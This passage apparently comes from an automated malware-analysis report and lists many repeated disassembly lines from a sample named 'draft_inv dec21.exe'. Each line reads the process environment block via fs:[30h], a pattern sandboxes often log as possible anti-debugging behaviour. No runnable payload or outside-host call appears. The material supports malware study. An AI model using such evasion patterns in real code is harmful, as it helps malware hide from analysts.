Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov ecx, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E945E30 mov eax, dword ptr fs:[00000030h] 8_2_1E945E30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978E26 mov eax, dword ptr fs:[00000030h] 8_2_1E978E26
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECE3F mov eax, dword ptr fs:[00000030h] 8_2_1E8ECE3F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B2E32 mov eax, dword ptr fs:[00000030h] 8_2_1E8B2E32
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov ecx, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92DE50 mov eax, dword ptr fs:[00000030h] 8_2_1E92DE50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DEE48 mov eax, dword ptr fs:[00000030h] 8_2_1E8DEE48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AFE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AAE40 mov eax, dword ptr fs:[00000030h] 8_2_1E8AAE40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADE45 mov eax, dword ptr fs:[00000030h] 8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADE45 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ADE45
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABE60 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABE60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EE78 mov eax, dword ptr fs:[00000030h] 8_2_1E96EE78
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984E62 mov eax, dword ptr fs:[00000030h] 8_2_1E984E62
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960E6D mov eax, dword ptr fs:[00000030h] 8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1E70 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1E70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECE70 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECE70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E7E71 mov eax, dword ptr fs:[00000030h] 8_2_1E8E7E71
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F8B mov eax, dword ptr fs:[00000030h] 8_2_1E938F8B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0F90 mov eax, dword ptr fs:[00000030h] 8_2_1E8C0F90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DBF93 mov eax, dword ptr fs:[00000030h] 8_2_1E8DBF93
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1FAA mov eax, dword ptr fs:[00000030h] 8_2_1E8B1FAA
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E8FBC mov eax, dword ptr fs:[00000030h] 8_2_1E8E8FBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B4FB6 mov eax, dword ptr fs:[00000030h] 8_2_1E8B4FB6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCFB0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DCFB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EFD3 mov eax, dword ptr fs:[00000030h] 8_2_1E96EFD3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABFC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABFC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov ecx, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FFDC mov eax, dword ptr fs:[00000030h] 8_2_1E92FFDC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A9FD0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A9FD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931FC9 mov eax, dword ptr fs:[00000030h] 8_2_1E931FC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984FFF mov eax, dword ptr fs:[00000030h] 8_2_1E984FFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C6FE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8FFB mov eax, dword ptr fs:[00000030h] 8_2_1E8D8FFB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBF0C mov eax, dword ptr fs:[00000030h] 8_2_1E8EBF0C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984F1D mov eax, dword ptr fs:[00000030h] 8_2_1E984F1D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h] 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CCF00 mov eax, dword ptr fs:[00000030h] 8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92FF03 mov eax, dword ptr fs:[00000030h] 8_2_1E92FF03
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F0F16 mov eax, dword ptr fs:[00000030h] 8_2_1E8F0F16
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov eax, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E938F3C mov ecx, dword ptr fs:[00000030h] 8_2_1E938F3C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDF36 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDF36
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFF30 mov edi, dword ptr fs:[00000030h] 8_2_1E8AFF30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96AF50 mov ecx, dword ptr fs:[00000030h] 8_2_1E96AF50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BF4D mov eax, dword ptr fs:[00000030h] 8_2_1E96BF4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E906F70 mov eax, dword ptr fs:[00000030h] 8_2_1E906F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984F7C mov eax, dword ptr fs:[00000030h] 8_2_1E984F7C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96EF66 mov eax, dword ptr fs:[00000030h] 8_2_1E96EF66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEF79 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEF79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABF70 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABF70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1F70 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1F70
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAF72 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAF72
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96FC95 mov eax, dword ptr fs:[00000030h] 8_2_1E96FC95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov ecx, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E959C98 mov eax, dword ptr fs:[00000030h] 8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7C85 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7C85
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E933C80 mov ecx, dword ptr fs:[00000030h] 8_2_1E933C80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h] 8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B7C95 mov eax, dword ptr fs:[00000030h] 8_2_1E8B7C95
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov ecx, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E943CD4 mov eax, dword ptr fs:[00000030h] 8_2_1E943CD4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9CCF mov eax, dword ptr fs:[00000030h] 8_2_1E8E9CCF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BFCC9 mov eax, dword ptr fs:[00000030h] 8_2_1E8BFCC9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E935CD0 mov eax, dword ptr fs:[00000030h] 8_2_1E935CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984CD2 mov eax, dword ptr fs:[00000030h] 8_2_1E984CD2
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E6CC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8E6CC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h] 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D8CDF mov eax, dword ptr fs:[00000030h] 8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8CDCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov ecx, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ECCD1 mov eax, dword ptr fs:[00000030h] 8_2_1E8ECCD1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92CCF0 mov ecx, dword ptr fs:[00000030h] 8_2_1E92CCF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7CF1 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7CF1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3CF0 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947CE8 mov eax, dword ptr fs:[00000030h] 8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E930CEE mov eax, dword ptr fs:[00000030h] 8_2_1E930CEE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h] 8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DECF3 mov eax, dword ptr fs:[00000030h] 8_2_1E8DECF3
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2C10 mov eax, dword ptr fs:[00000030h] 8_2_1E8E2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C20 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CAC20 mov eax, dword ptr fs:[00000030h] 8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E947C38 mov eax, dword ptr fs:[00000030h] 8_2_1E947C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975C38 mov eax, dword ptr fs:[00000030h] 8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975C38 mov ecx, dword ptr fs:[00000030h] 8_2_1E975C38
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E4C3D mov eax, dword ptr fs:[00000030h] 8_2_1E8E4C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A8C3D mov eax, dword ptr fs:[00000030h] 8_2_1E8A8C3D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984C59 mov eax, dword ptr fs:[00000030h] 8_2_1E984C59
